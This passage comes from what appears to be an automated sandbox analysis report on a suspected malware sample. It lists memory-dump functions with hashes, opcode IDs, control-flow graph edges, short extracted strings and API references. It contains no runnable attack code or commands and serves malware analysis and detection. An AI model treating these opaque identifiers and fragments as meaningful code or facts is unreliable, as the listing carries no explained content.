                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$$^q
                                                                                                        • API String ID: 0-1593437937
                                                                                                        • Opcode ID: 79f98410723d42e3381860d9df80e8c42ba959af038eb0b2daf8f4dc853f32a6
                                                                                                        • Instruction ID: 7cbb82626248a834ab7417794c9a3df93baf69c4179b25f1a3c350ae86b826e8
                                                                                                        • Opcode Fuzzy Hash: 79f98410723d42e3381860d9df80e8c42ba959af038eb0b2daf8f4dc853f32a6
                                                                                                        • Instruction Fuzzy Hash: D2F17F74E04209CFDB59DFB8D8545AEBBB6FFC9300B148969E446AB358CF359802CB51
                                                                                                        Function 06969548 Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4146949146.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_6960000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 082f45a3c924969e1193365f62736ea8e79b5b21a4b4f1f826204640a08e0896
                                                                                                        • Instruction ID: 5d3bcb6a3b252749d33a731e3e7aa7119e776ef3e1ce7e8ad15b0d54104c71a9
                                                                                                        • Opcode Fuzzy Hash: 082f45a3c924969e1193365f62736ea8e79b5b21a4b4f1f826204640a08e0896
                                                                                                        • Instruction Fuzzy Hash: C831F3B1D016199BEB18CFABD9847DDFBF6AF88314F14C52AE418A62A4DB700945CF50
                                                                                                        Function 029EE988 Relevance: .1, Instructions: 147COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 956749b06ab307118f6519564b4d06236ebb861bfe6fe22bd26393550d348fd2
                                                                                                        • Instruction ID: d396c29f774225973161790ef5865b955e88957fd92b13aff697e9541d9d4b93
                                                                                                        • Opcode Fuzzy Hash: 956749b06ab307118f6519564b4d06236ebb861bfe6fe22bd26393550d348fd2
                                                                                                        • Instruction Fuzzy Hash: 2D51C374E00308DFDB19DFAAD584A9DBBF6BF88310F208429E819AB364DB319945CF14
                                                                                                        Function 029EE97B Relevance: .1, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f1bb674334bc80ad804a9e6468ed23cd605fd24e71e9eb06099f1e68bed7847
                                                                                                        • Instruction ID: 90e602afc06ae8dd12f65fa163a6b1c9a5e6256e79406cf51152e7c8a209856c
                                                                                                        • Opcode Fuzzy Hash: 6f1bb674334bc80ad804a9e6468ed23cd605fd24e71e9eb06099f1e68bed7847
                                                                                                        • Instruction Fuzzy Hash: 0A51D474E00208DFDB19DFAAD584A9DBBF6BF88310F248429E815BB3A4DB319845CF14
                                                                                                        Function 029E76F1 Relevance: 10.5, Strings: 8, Instructions: 471COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 29e76f1-29e7725 1 29e772b-29e774e 0->1 2 29e7b54-29e7b58 0->2 11 29e77fc-29e7800 1->11 12 29e7754-29e7761 1->12 3 29e7b5a-29e7b6e 2->3 4 29e7b71-29e7b7f 2->4 9 29e7bf0-29e7c05 4->9 10 29e7b81-29e7b96 4->10 17 29e7c0c-29e7c19 9->17 18 29e7c07-29e7c0a 9->18 19 29e7b9d-29e7baa 10->19 20 29e7b98-29e7b9b 10->20 15 29e7848-29e7851 11->15 16 29e7802-29e7810 11->16 24 29e7763-29e776e 12->24 25 29e7770 12->25 21 29e7c67 15->21 22 29e7857-29e7861 15->22 16->15 36 29e7812-29e782d 16->36 26 29e7c1b-29e7c56 17->26 18->26 27 29e7bac-29e7bed 19->27 20->27 30 29e7c6c-29e7c9c 21->30 22->2 28 29e7867-29e7870 22->28 31 29e7772-29e7774 24->31 25->31 74 29e7c5d-29e7c64 26->74 34 29e787f-29e788b 28->34 35 29e7872-29e7877 28->35 53 29e7c9e-29e7cb4 30->53 54 29e7cb5-29e7cbc 30->54 31->11 38 29e777a-29e77dc 31->38 34->30 41 29e7891-29e7897 34->41 35->34 60 29e782f-29e7839 36->60 61 29e783b 36->61 86 29e77de 38->86 87 29e77e2-29e77f9 38->87 43 29e7b3e-29e7b42 41->43 44 29e789d-29e78ad 41->44 43->21 47 29e7b48-29e7b4e 43->47 58 29e78af-29e78bf 44->58 59 29e78c1-29e78c3 44->59 47->2 47->28 62 29e78c6-29e78cc 58->62 59->62 63 29e783d-29e783f 60->63 61->63 62->43 66 29e78d2-29e78e1 62->66 63->15 67 29e7841 63->67 72 29e798f-29e79ba call 29e7538 * 2 66->72 73 29e78e7 66->73 67->15 90 29e7aa4-29e7abe 72->90 91 29e79c0-29e79c4 72->91 76 29e78ea-29e78fb 73->76 76->30 79 29e7901-29e7913 76->79 79->30 81 29e7919-29e7931 79->81 144 29e7933 call 29e80d8 81->144 145 29e7933 call 29e80c9 81->145 85 29e7939-29e7949 85->43 89 29e794f-29e7952 85->89 86->87 87->11 92 29e795c-29e795f 89->92 93 29e7954-29e795a 89->93 90->2 113 29e7ac4-29e7ac8 90->113 91->43 95 29e79ca-29e79ce 91->95 92->21 96 29e7965-29e7968 92->96 93->92 93->96 98 29e79f6-29e79fc 95->98 99 29e79d0-29e79dd 95->99 100 29e796a-29e796e 96->100 101 29e7970-29e7973 96->101 103 29e79fe-29e7a02 98->103 104 29e7a37-29e7a3d 98->104 116 29e79df-29e79ea 99->116 117 29e79ec 99->117 100->101 102 29e7979-29e797d 100->102 101->21 101->102 102->21 105 29e7983-29e7989 102->105 103->104 106 29e7a04-29e7a0d 103->106 107 29e7a3f-29e7a43 104->107 108 29e7a49-29e7a4f 104->108 105->72 105->76 111 29e7a0f-29e7a14 106->111 112 29e7a1c-29e7a32 106->112 107->74 107->108 114 29e7a5b-29e7a5d 108->114 115 29e7a51-29e7a55 108->115 111->112 112->43 121 29e7aca-29e7ad4 call 29e63e0 113->121 122 29e7b04-29e7b08 113->122 118 29e7a5f-29e7a68 114->118 119 29e7a92-29e7a94 114->119 115->43 115->114 120 29e79ee-29e79f0 116->120 117->120 125 29e7a6a-29e7a6f 118->125 126 29e7a77-29e7a8d 118->126 119->43 127 29e7a9a-29e7aa1 119->127 120->43 120->98 121->122 132 29e7ad6-29e7aeb 121->132 122->74 129 29e7b0e-29e7b12 122->129 125->126 126->43 129->74 131 29e7b18-29e7b25 129->131 135 29e7b27-29e7b32 131->135 136 29e7b34 131->136 132->122 141 29e7aed-29e7b02 132->141 138 29e7b36-29e7b38 135->138 136->138 138->43 138->74 141->2 141->122 144->85 145->85
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                        • API String ID: 0-1932283790
                                                                                                        • Opcode ID: 1a75737e618d412488d9cff4b4b1910c596f141e3223321f0c4a00a83684192f
                                                                                                        • Instruction ID: e11a10daa2a7945ab3baf31dfad0952292dacf7221df79386f63c8f893dfa0ff
                                                                                                        • Opcode Fuzzy Hash: 1a75737e618d412488d9cff4b4b1910c596f141e3223321f0c4a00a83684192f
                                                                                                        • Instruction Fuzzy Hash: FA124730A002099FCB16CFA8D984AAEFBF6FF48314F148599E45A9B361DB30ED45CB51
                                                                                                        Function 029E8490 Relevance: 3.2, Strings: 2, Instructions: 701COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2271 29e8490-29e897e 2346 29e8984-29e8994 2271->2346 2347 29e8ed0-29e8f05 2271->2347 2346->2347 2348 29e899a-29e89aa 2346->2348 2351 29e8f07-29e8f0c 2347->2351 2352 29e8f11-29e8f2f 2347->2352 2348->2347 2350 29e89b0-29e89c0 2348->2350 2350->2347 2353 29e89c6-29e89d6 2350->2353 2354 29e8ff6-29e8ffb 2351->2354 2364 29e8fa6-29e8fb2 2352->2364 2365 29e8f31-29e8f3b 2352->2365 2353->2347 2355 29e89dc-29e89ec 2353->2355 2355->2347 2357 29e89f2-29e8a02 2355->2357 2357->2347 2358 29e8a08-29e8a18 2357->2358 2358->2347 2360 29e8a1e-29e8a2e 2358->2360 2360->2347 2361 29e8a34-29e8a44 2360->2361 2361->2347 2363 29e8a4a-29e8a5a 2361->2363 2363->2347 2366 29e8a60-29e8ecf 2363->2366 2370 29e8fc9-29e8fd5 2364->2370 2371 29e8fb4-29e8fc0 2364->2371 2365->2364 2372 29e8f3d-29e8f49 2365->2372 2381 29e8fec-29e8fee 2370->2381 2382 29e8fd7-29e8fe3 2370->2382 2371->2370 2380 29e8fc2-29e8fc7 2371->2380 2377 29e8f6e-29e8f71 2372->2377 2378 29e8f4b-29e8f56 2372->2378 2383 29e8f88-29e8f94 2377->2383 2384 29e8f73-29e8f7f 2377->2384 2378->2377 2390 29e8f58-29e8f62 2378->2390 2380->2354 2381->2354 2382->2381 2392 29e8fe5-29e8fea 2382->2392 2388 29e8ffc-29e901e 2383->2388 2389 29e8f96-29e8f9d 2383->2389 2384->2383 2396 29e8f81-29e8f86 2384->2396 2397 29e902e 2388->2397 2398 29e9020 2388->2398 2389->2388 2393 29e8f9f-29e8fa4 2389->2393 2390->2377 2402 29e8f64-29e8f69 2390->2402 2392->2354 2393->2354 2396->2354 2401 29e9030-29e9031 2397->2401 2398->2397 2400 29e9027-29e902c 2398->2400 2400->2401 2402->2354
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q
                                                                                                        • API String ID: 0-355816377
                                                                                                        • Opcode ID: 39497f9eeb3e01cfcae40cfce80322edc71c7d5915d861bb067cc4b1bc18e359
                                                                                                        • Instruction ID: 79919cfa59439164ead6a6c4a10b4455b5fd8ccc980c2424f3690a52b6e927fd
                                                                                                        • Opcode Fuzzy Hash: 39497f9eeb3e01cfcae40cfce80322edc71c7d5915d861bb067cc4b1bc18e359
                                                                                                        • Instruction Fuzzy Hash: BE523374A00219CFEB159BA4C890BAEBB77FF94304F1081AAD10A6B3A5CF359D49DF51
                                                                                                        Function 029E5F38 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hbq$Hbq
                                                                                                        • API String ID: 0-4258043069
                                                                                                        • Opcode ID: e730849497e6b8cec394b2aa8c8b3a19ca5fa776c2ebb9f4cdd402a133ccdd0a
                                                                                                        • Instruction ID: e1cd0af6fc6c43bb1b833a1e4190c0f4f9a7567b72fa715bfaf78d7dc3cd7367
                                                                                                        • Opcode Fuzzy Hash: e730849497e6b8cec394b2aa8c8b3a19ca5fa776c2ebb9f4cdd402a133ccdd0a
                                                                                                        • Instruction Fuzzy Hash: A3B1CC30B042518FDF169F39C894B6A7BEAAF99304F188969E846CB395DF34D842C791
                                                                                                        Function 029E6498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,bq$,bq
                                                                                                        • API String ID: 0-2699258169
                                                                                                        • Opcode ID: adbcd5ef6a973f6814f5f07f6e1aec1d2c73d761ac9b4655060eb2b44624936b
                                                                                                        • Instruction ID: 5faa3d4cc911a0ee4c0c1db23c56e768f1f10f1993311c476384076c2537bebc
                                                                                                        • Opcode Fuzzy Hash: adbcd5ef6a973f6814f5f07f6e1aec1d2c73d761ac9b4655060eb2b44624936b
                                                                                                        • Instruction Fuzzy Hash: 3681DFB0B10505CFCF15CF68C488AAEBBBABF99B14B158569D407DB368DB32E841CB50
                                                                                                        Function 029E9C30 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q
                                                                                                        • API String ID: 0-2697143702
                                                                                                        • Opcode ID: 083590df7bead3577f55ab105f0be4a627bea6522b2e2365d0d01b6ad64a2f02
                                                                                                        • Instruction ID: 6280bfdf3138fdfbac4e7ebad0151f584857f2e2b021ea4226b3e4e01e557bc8
                                                                                                        • Opcode Fuzzy Hash: 083590df7bead3577f55ab105f0be4a627bea6522b2e2365d0d01b6ad64a2f02
                                                                                                        • Instruction Fuzzy Hash: DA515F707002559FEB05DB69C844B6EBBAAEF88310F148466E909CB256DB75DC42CB51
                                                                                                        Function 029E3CB1 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xbq$Xbq
                                                                                                        • API String ID: 0-1243427068
                                                                                                        • Opcode ID: 870e54565e27cc83831ec02a01fe39b0539888aef0b6649996581d911073f810
                                                                                                        • Instruction ID: 5e2226543cc129eb2795415311ea571c98d0ba5eb5cd1bba152ce4b0e1689a15
                                                                                                        • Opcode Fuzzy Hash: 870e54565e27cc83831ec02a01fe39b0539888aef0b6649996581d911073f810
                                                                                                        • Instruction Fuzzy Hash: A0314831B042258BDF1E467AC99437FAAEABFC4305F0848BAE807C7394DB74C8818795
                                                                                                        Function 029E0C8F Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LR^q
                                                                                                        • API String ID: 0-2625958711
                                                                                                        • Opcode ID: 4cb6f16b52d6d8dc27ce128e00ddf558d6971cc09e124251156c156bfc3a2fe2
                                                                                                        • Instruction ID: b5f971e8978c0ff8e63924b818767f6589330e135ff08ae9a61d4cdcdf549d3f
                                                                                                        • Opcode Fuzzy Hash: 4cb6f16b52d6d8dc27ce128e00ddf558d6971cc09e124251156c156bfc3a2fe2
                                                                                                        • Instruction Fuzzy Hash: D052E874900A19CFCB54EF68EA95A8EBBF2FB49305F1045A5D40DA7768DB306E85CF80
                                                                                                        Function 029E0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LR^q
                                                                                                        • API String ID: 0-2625958711
                                                                                                        • Opcode ID: 2594cee2818c10a40c4cc86b5cdf7b38ac41b3bfaa5fa8ed6a922336d64659bd
                                                                                                        • Instruction ID: 3329b006b106da5a527817fc57c4ff1abe690595ca000fd0927c1f8278ca6576
                                                                                                        • Opcode Fuzzy Hash: 2594cee2818c10a40c4cc86b5cdf7b38ac41b3bfaa5fa8ed6a922336d64659bd
                                                                                                        • Instruction Fuzzy Hash: 2B52E874900A19CFCB54EF68EA95A8EBBF2FB49305F1045A5D40DA7768DB306E85CF80
                                                                                                        Function 0696992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06969A6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4146949146.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_6960000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 32b977c065ddcd58d011ccf82d109afea14a3c86a238fd579e7ee6489d1fd874
                                                                                                        • Instruction ID: 6a9d07012427b208f811bb91a23585c74b7db357b74c0f8e8f0051a686e56db0
                                                                                                        • Opcode Fuzzy Hash: 32b977c065ddcd58d011ccf82d109afea14a3c86a238fd579e7ee6489d1fd874
                                                                                                        • Instruction Fuzzy Hash: FF116774E0120A8FDB44CFAAD984AADBBF5FF88324F648565F904E7645DB30A941CB60
                                                                                                        Function 029EAEF0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (o^q
                                                                                                        • API String ID: 0-74704288
                                                                                                        • Opcode ID: 6a122b5d41013ec9cff823eee6de5b02eba7ec4e2653a4c6549f68e391acce2c
                                                                                                        • Instruction ID: d7ca16fcc6b1ac280ec2876ecf88ca30a5264a45db48f63fd4f74c12513c17a7
                                                                                                        • Opcode Fuzzy Hash: 6a122b5d41013ec9cff823eee6de5b02eba7ec4e2653a4c6549f68e391acce2c
                                                                                                        • Instruction Fuzzy Hash: F941E432B002549FCB0A9F78D854AAEBBB6BFC8311B14486AD506D7395DE319C06C7A0
                                                                                                        Function 029EE007 Relevance: .7, Instructions: 652COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 03a01e6509410c94bbc0c4c42d238ab3e340489b817f0797457ba67cdc9dec58
                                                                                                        • Instruction ID: b9ac443e1b54318ad36aa01ea50e3c1c15a0a30fb5506503e7809926e099bd34
                                                                                                        • Opcode Fuzzy Hash: 03a01e6509410c94bbc0c4c42d238ab3e340489b817f0797457ba67cdc9dec58
                                                                                                        • Instruction Fuzzy Hash: 6012AC34CA1346CFD2642F70E2FC12ABA61FB1F363704AC55E12BD04499F7194ABAB61
                                                                                                        Function 029EE018 Relevance: .6, Instructions: 647COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e29704121c16e868e5702dcb60782b75553b78809a1f069e4e2ef5aa4cd988d
                                                                                                        • Instruction ID: 85311a90041f0fc55ebd01cf7b28a03b2d795a6c77aa82f9c80a7979d93cc98a
                                                                                                        • Opcode Fuzzy Hash: 1e29704121c16e868e5702dcb60782b75553b78809a1f069e4e2ef5aa4cd988d
                                                                                                        • Instruction Fuzzy Hash: 1412AC35CA1346CF92642F70E2FC12EBA61FB1F363704AC51E12BD04499F7194ABAE65
                                                                                                        Function 029E9A10 Relevance: .2, Instructions: 230COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40c1692aa3328983eafa25ef0dcc28933149fc9cf81699eafdff2a26b6e7a800
                                                                                                        • Instruction ID: ee8069ba716de62af0d0a51c441e20124bf15394a06b45ea193a03701d3a02e0
                                                                                                        • Opcode Fuzzy Hash: 40c1692aa3328983eafa25ef0dcc28933149fc9cf81699eafdff2a26b6e7a800
                                                                                                        • Instruction Fuzzy Hash: 10911831500645CFCB12CF6CD8849AABFB6FF85324B14C6AAD85AD7356C731E856CBA0
                                                                                                        Function 029E80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 688de6e28df1731879c2f2e28c0bea15ddffe10ce2e26bb759cd2996a34180b6
                                                                                                        • Instruction ID: bfc14c85cf9efd41d5a63afa09fe787e10cbd1ae09c4cbf78e09058ff2d3cd97
                                                                                                        • Opcode Fuzzy Hash: 688de6e28df1731879c2f2e28c0bea15ddffe10ce2e26bb759cd2996a34180b6
                                                                                                        • Instruction Fuzzy Hash: E37129347006058FCF16DFA8C884BAA7BEABF89745B1544A9E806DB3B1DB70DC41CB51
                                                                                                        Function 029EF71F Relevance: .2, Instructions: 152COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: efe96457012930ab50ea63bab1a0cdf5185ee64000767ae6b15bd57d257abbbb
                                                                                                        • Instruction ID: 3ed83b215cf71bdd2296f58eb8597e0215769bb48419987bb579d6a72fdf933f
                                                                                                        • Opcode Fuzzy Hash: efe96457012930ab50ea63bab1a0cdf5185ee64000767ae6b15bd57d257abbbb
                                                                                                        • Instruction Fuzzy Hash: E561E134D01318DFDB15DFA5D984AAEBBB2BF88304F208529D80AAB395DB35594ACF40
                                                                                                        Function 029ED548 Relevance: .1, Instructions: 136COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 15652b8a0cd4cbaadc2c0606ae8dfafb689d116cf4d71cf2af8babe535deab23
                                                                                                        • Instruction ID: f4653056c80b302b61282c02e1d7ed9f81f91ba920a775a7a47d9b025a956eb3
                                                                                                        • Opcode Fuzzy Hash: 15652b8a0cd4cbaadc2c0606ae8dfafb689d116cf4d71cf2af8babe535deab23
                                                                                                        • Instruction Fuzzy Hash: C8519374E01218DFDB58DFA9D98499DBBF2BF89300F248169E419AB364DB309901CF10
                                                                                                        Function 029E41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ed56c480caa53ee92798f93a26d29150150bbbfaf9d53a59044a893a34ff62b8
                                                                                                        • Instruction ID: 1550c24820fc15086459f14e574596639cb8babbbca5fe4ae8c19d430302e9c5
                                                                                                        • Opcode Fuzzy Hash: ed56c480caa53ee92798f93a26d29150150bbbfaf9d53a59044a893a34ff62b8
                                                                                                        • Instruction Fuzzy Hash: A851A074E01608CFCF09DFA9D58499DBBF2FF89304B209569E819AB324DB35A942CF50
                                                                                                        Function 029EA303 Relevance: .1, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ab972e01d9d111b04ea8e8cc380265e6195dac246191698b3b9be30eb16fa59b
                                                                                                        • Instruction ID: 761b8f19afc64ff047ad31ab943ff62b01a7b12832c4ae7f5e075925aa32a919
                                                                                                        • Opcode Fuzzy Hash: ab972e01d9d111b04ea8e8cc380265e6195dac246191698b3b9be30eb16fa59b
                                                                                                        • Instruction Fuzzy Hash: 1F41B231A04249DFCF16CFA8C884B9DBFB2FF89314F048456E84A9B2A5E334D915CB60
                                                                                                        Function 029E5658 Relevance: .1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 524e363f1467db149db96c98e1880af022106d8a6c1420b942d8c098c89b420c
                                                                                                        • Instruction ID: 93cbc304b025431eb7808261d89026aabf17558898d1752cb022d47a60047e67
                                                                                                        • Opcode Fuzzy Hash: 524e363f1467db149db96c98e1880af022106d8a6c1420b942d8c098c89b420c
